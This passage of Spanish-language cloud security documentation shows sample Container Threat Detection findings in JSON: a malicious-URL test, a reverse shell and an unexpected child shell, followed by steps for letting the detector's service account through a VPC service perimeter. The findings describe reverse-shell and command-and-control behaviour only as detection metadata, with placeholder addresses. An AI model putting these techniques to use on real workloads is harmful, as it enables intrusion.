            "testsafebrowsing.appspot.com/s/malware.html"
          ]
        },
        "kubernetes": {
          "pods": [
            {
              "ns": "default",
              "name": "CONTAINER_NAME",
              "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
              ]
            }
          ]
        },
        "mitreAttack": {
          "primaryTactic": "COMMAND_AND_CONTROL",
          "primaryTechniques": [
            "INGRESS_TOOL_TRANSFER"
          ]
        },
        "mute": "UNDEFINED",
        "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
        "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
        "parentDisplayName": "Container Threat Detection",
        "processes": [
          {
            "binary": {
              "path": "\"/bin/echo\""
            },
            "script": {},
            "args": [
              "\"/bin/echo\"",
              "\"https://testsafebrowsing.appspot.com/s/malware.html\""
            ],
            "envVariables": [
              {
                "name": "\"PATH\"",
                "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
              },
              {
                "name": "\"HOSTNAME\"",
                "val": "\"CONTAINER_NAME\""
              },
              {
                "name": "\"DEBIAN_FRONTEND\"",
                "val": "\"noninteractive\""
              },
              {
                "name": "\"LANG\"",
                "val": "\"C.UTF-8\""
              },
              {
                "name": "\"PYTHONUNBUFFERED\"",
                "val": "\"1\""
              },
              {
                "name": "\"PORT\"",
                "val": "\"8080\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
                "val": "\"IP_ADDRESS\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_HOST\"",
                "val": "\"IP_ADDRESS\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_PORT\"",
                "val": "\"443\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
                "val": "\"443\""
              },
              {
                "name": "\"KUBERNETES_PORT\"",
                "val": "\"tcp://IP_ADDRESS:443\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP\"",
                "val": "\"tcp://IP_ADDRESS:443\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
                "val": "\"tcp\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
                "val": "\"443\""
              },
              {
                "name": "\"HOME\"",
                "val": "\"/root\""
              }
            ],
            "pid": "1"
          }
        ],
        "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
        "severity": "MEDIUM",
        "sourceDisplayName": "Container Threat Detection",
        "state": "ACTIVE",
        "vulnerability": {},
        "workflowState": "NEW"
      },
      "resource": {
        "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
        "display_name": "CLUSTER_ID",
        "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
        "project_display_name": "PROJECT_ID",
        "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
        "parent_display_name": "PROJECT_ID",
        "type": "google.container.Cluster",
        "folders": []
      },
      "sourceProperties": {
        "Container_Image_Id": "CONTAINER_IMAGE_ID",
        "Pod_Namespace": "default",
        "Container_Name": "CONTAINER_NAME",
        "Process_Binary_Fullpath": "/bin/echo",
        "description": "A malicious URL is observed in the container workload.",
        "VM_Instance_Name": "VM_INSTANCE_NAME",
        "Pid": 1,
        "Process_Arguments": [
          "/bin/echo",
          "https://testsafebrowsing.appspot.com/s/malware.html"
        ],
        "Container_Image_Uri": "CONTAINER_IMAGE_URI",
        "Parent_Pid": 0,
        "Process_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 7717272
        },
        "Environment_Variables": [
          "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
          "HOSTNAME=CONTAINER_NAME",
          "DEBIAN_FRONTEND=noninteractive",
          "LANG=C.UTF-8",
          "PYTHONUNBUFFERED=1",
          "PORT=8080",
          "KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS",
          "KUBERNETES_SERVICE_HOST=IP_ADDRESS",
          "KUBERNETES_SERVICE_PORT=443",
          "KUBERNETES_SERVICE_PORT_HTTPS=443",
          "KUBERNETES_PORT=tcp://IP_ADDRESS:443",
          "KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:443",
          "KUBERNETES_PORT_443_TCP_PROTO=tcp",
          "KUBERNETES_PORT_443_TCP_PORT=443",
          "HOME=/root"
        ],
        "Container_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 0
        },
        "Pod_Name": "CONTAINER_NAME"
      }
    }
  

Shells inversas

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Reverse Shell",
    "sourceProperties": {
      "Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS",
      "Environment_Variables": ["HOSTNAME\u003dreverse-shell",
      "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443", "PYTHONUNBUFFERED\u003d1",
      "KUBERNETES_SERVICE_PORT\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",
      "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
      ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
      , "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1",
      "HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"],
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Container_Creation_Timestamp": {
        "seconds": 1.617989861E9,
        "nanos": 0.0
      },
      "Pod_Name": "POD_NAME",
      "Container_Name": "CONTAINER_NAME",
      "Process_Arguments": ["BINARY_PATH", "BINARY_NAME"],
      "Pid": 15.0,
      "Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT,
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": "DESTINATION_IP_ADDRESS",
      "Pod_Namespace": "default",
      "VM_Instance_Name": "INSTANCE_ID",
      "Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT,
      "description": "A process started with stream redirection to a remote
      connected socket. With a reverse shell, an attacker can communicate from a
      compromised workload to an attacker-controlled machine. The attacker can
      then command and control the workload to perform desired actions, for
      example as part of a botnet.",
      "Parent_Pid": 1.0,
      "Process_Creation_Timestamp": {
        "seconds": 1.61798989E9,
        "nanos": 6.16573691E8
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:38:10.904Z",
    "createTime": "2021-04-09T17:38:15.486Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": {
        "primitiveDataType": "STRING"
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Reverse_Shell_Stdin_Redirection_Src_Ip": {
        "primitiveDataType": "STRING"
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Reverse_Shell_Stdin_Redirection_Dst_Port": {
        "primitiveDataType": "NUMBER"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Reverse_Shell_Stdin_Redirection_Src_Port": {
        "primitiveDataType": "NUMBER"
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Shell secundario inesperado

{
  "finding": {
    "access": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Unexpected Child Shell",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-06-29T17:34:13.765Z",
    "database": {},
    "description": "A process should not normally create child shell processes, spawn a child shell process.",
    "eventTime": "2023-06-29T17:34:13.492Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "ns": "default",
          "name": "CONTAINER_NAME",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI",
              "imageId": CONTAINER_IMAGE_ID"
            }
          ]
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "COMMAND_AND_SCRIPTING_INTERPRETER"
      ]
    },
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/home/vmagent/app/temp/dash\"",
          "size": "31376",
          "sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e",
          "hashedSize": "31376",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"./temp/dash\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.52.113.1:443\""
          },
          {
            "name": "\"PYTHONUNBUFFERED\"",
            "val": "\"1\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.52.113.1\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/home/vmagent/app\""
          },
          {
            "name": "\"LANG\"",
            "val": "\"C.UTF-8\""
          },
          {
            "name": "\"SHLVL\"",
            "val": "\"1\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"PORT\"",
            "val": "\"8080\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.52.113.1\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.52.113.1:443\""
          },
          {
            "name": "\"_\"",
            "val": "\"./temp/dash\""
          }
        ],
        "pid": "15",
        "parentPid": "14"
      },
      {
        "binary": {
          "path": "\"/home/vmagent/app/temp/consul\"",
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"./temp/consul\""
        ],
        "argumentsTruncated": false,
        "pid": "14",
        "parentPid": "13"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "Process_Arguments": [
      "./temp/dash"
    ],
    "Pid": 15,
    "Process_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 207040864
    },
    "Container_Image_Uri": "CONTAINER_IMAGE_URI",
    "Process_Binary_Fullpath": "/home/vmagent/app/temp/dash",
    "VM_Instance_Name": "INSTANCE_ID",
    "Pod_Name": "POD_NAME",
    "Pod_Namespace": "default",
    "Container_Name": "CONTAINER_NAME",
    "Container_Image_Id": "CONTAINER_IMAGE_ID",
    "Container_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 0
    },
    "Parent_Pid": 14,
    "Environment_Variables": [
      "HOSTNAME=ktd-test-unexpected-child-shell-3f50de2ab54bac1b",
      "KUBERNETES_PORT_443_TCP_PORT=443",
      "KUBERNETES_PORT=tcp://10.52.113.1:443",
      "PYTHONUNBUFFERED=1",
      "KUBERNETES_SERVICE_PORT=443",
      "KUBERNETES_SERVICE_HOST=10.52.113.1",
      "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "PWD=/home/vmagent/app",
      "LANG=C.UTF-8",
      "SHLVL=1",
      "HOME=/root",
      "KUBERNETES_PORT_443_TCP_PROTO=tcp",
      "KUBERNETES_SERVICE_PORT_HTTPS=443",
      "DEBIAN_FRONTEND=noninteractive",
      "PORT=8080",
      "KUBERNETES_PORT_443_TCP_ADDR=10.52.113.1",
      "KUBERNETES_PORT_443_TCP=tcp://10.52.113.1:443",
      "_=./temp/dash"
    ]
  }
}
    

Analiza proyectos protegidos por un perímetro de servicio

Si activaste Security Command Center al nivel de la organización después de 7 de diciembre de 2023 y tienen una perímetro de servicio que bloquea el acceso a ciertos proyectos y servicios, debes otorgar a la cuenta de servicio acceso de entrada para Container Threat Detection a ese perímetro de servicio. De lo contrario, Container Threat Detection no puede producir hallazgos relacionados con los proyectos y servicios protegidos.

Para las activaciones a nivel de la organización, el identificador de la cuenta de servicio es una dirección de correo electrónico con el siguiente formato:

service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

En el ejemplo anterior, reemplaza ORGANIZATION_ID por el identificador numérico de tu organización.

Si tu clúster está dentro de un perímetro de servicio de Controles del servicio de VPC, asegúrate de lo siguiente: Se incluye containerthreatdetection.googleapis.com, la API de Container Threat Detection como un servicio accesible. Para obtener más información, consulta Descripción general del perímetro de servicio.

Para otorgar acceso entrante a una cuenta de servicio a un perímetro de servicio, sigue estos pasos.

  1. Ve a los Controles del servicio de VPC.

    Ir a los Controles del servicio de VPC

  2. En la barra de herramientas, selecciona tu organización de Google Cloud.

    Selector de proyectos

  3. En la lista desplegable, selecciona la política de acceso que contiene el perímetro de servicio al que deseas otorgar acceso.

    Lista de políticas de acceso

    Los perímetros de servicio asociados con la política de acceso aparecen en la lista.

  4. Haz clic en el nombre del perímetro de servicio.

  5. Haz clic en Editar perímetro.

  6. En el menú de navegación, haz clic en Política de entrada.

  7. Haga clic en Agregar regla.

  8. Configura la regla de la siguiente manera:

    Atributos FROM del cliente de la API

    1. En Fuente, selecciona Todas las fuentes.
    2. En Identidad, selecciona Identidades seleccionadas.
    3. En el campo Agregar usuario o cuenta de servicio, haz clic en Seleccionar.
    4. Ingresa la dirección de correo electrónico de la cuenta de servicio. Si tienes tanto a nivel de organización y de proyecto, agrega ambas.
    5. Haz clic en Guardar.

    Atributos TO de los recursos y servicios de GCP

    1. En Proyecto, selecciona Todos los proyectos.

    2. En Servicios, selecciona Todos los servicios o cada una de las siguientes opciones: servicios individuales que requiere Container Threat Detection:

      • API de Kubernetes Engine

      Si un perímetro de servicio restringe el acceso a un servicio obligatorio, la detección de amenazas a contenedores no puede producir resultados para ese servicio.

    3. En el menú de navegación, haz clic en Guardar.

    Para obtener más información, consulta Configura políticas de entrada y salida.

    ¿Qué sigue?